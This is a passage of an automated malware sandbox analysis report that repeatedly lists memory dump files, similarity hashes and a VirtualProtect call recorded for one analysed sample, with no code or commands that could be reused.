                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 07d21b7d3cc7c4c10eff04a9f666629b599e6123287b287356066a7a6680f988
                                                                                                                        • Instruction ID: 99fb7f812fc30dd67a8a23df3a2d064b4511fad256f5c479e17d888b49691586
                                                                                                                        • Opcode Fuzzy Hash: 07d21b7d3cc7c4c10eff04a9f666629b599e6123287b287356066a7a6680f988
                                                                                                                        • Instruction Fuzzy Hash: 8ED134A2D082649AF7208624DC447EB7A68DF51314F0440FED98DA72C1DABE5FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: f7584e4d2a8087fb65cfc1a0ca62cb735ae4cda63d473a9d9d38d3484e92d711
                                                                                                                        • Instruction ID: 2eb3e874b1c4aa01e51b347669719f9f5b5e43f5857c0d317553baf01cd7914e
                                                                                                                        • Opcode Fuzzy Hash: f7584e4d2a8087fb65cfc1a0ca62cb735ae4cda63d473a9d9d38d3484e92d711
                                                                                                                        • Instruction Fuzzy Hash: 47D136B2C042649AF7208624DC447EB7A69DF51314F1440FED98DA62C1DABE1FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 1be0917443ebbe20a96136dd23fbac885d9b2a13d24d572ba56184e524df3c9a
                                                                                                                        • Instruction ID: ca2380e374f470f38af7b9893bc6be273685a27750bc787c277f5f52459a791b
                                                                                                                        • Opcode Fuzzy Hash: 1be0917443ebbe20a96136dd23fbac885d9b2a13d24d572ba56184e524df3c9a
                                                                                                                        • Instruction Fuzzy Hash: 0BC136A2D082649AF7208624DC447EB7A69DF51314F0840FED98D672C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4e182af6198bdb259ac28646dfb70ca7a0c84178e6bb25da822de0b004e48401
                                                                                                                        • Instruction ID: 785747cffc71ee2e623740ec2709f746bb4eecd73c091485c27e31070438e9fb
                                                                                                                        • Opcode Fuzzy Hash: 4e182af6198bdb259ac28646dfb70ca7a0c84178e6bb25da822de0b004e48401
                                                                                                                        • Instruction Fuzzy Hash: 63C135B2C042649AF7208624DC447EB7A69DF51314F1440FED98DA62C1DABE0FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                        • Instruction ID: ea99530225736df8b548ebe2bae57b79cf499234a5dd8c7338e838a4a56707e2
                                                                                                                        • Opcode Fuzzy Hash: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                        • Instruction Fuzzy Hash: E5C135A2D082649AF7208624DC44BEB7A69DF51310F1440FED98D672C1DABE1FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                        • Instruction ID: d7193199d5c040545e3c9022d1fc5edff3b9aaee513072e49c1cd987f5022490
                                                                                                                        • Opcode Fuzzy Hash: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                        • Instruction Fuzzy Hash: 99C147A2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CBA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                        • Instruction ID: 02ac1c241656fbca97fd14fc078b331ed1feb611b8351a98511c686d9a3b4722
                                                                                                                        • Opcode Fuzzy Hash: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                        • Instruction Fuzzy Hash: 6EC135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE0FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                        • Instruction ID: c66bbedd050fd74ef394c8872448b7775fcb60110f28595935eee93ec1a4977d
                                                                                                                        • Opcode Fuzzy Hash: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                        • Instruction Fuzzy Hash: 4CC125B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
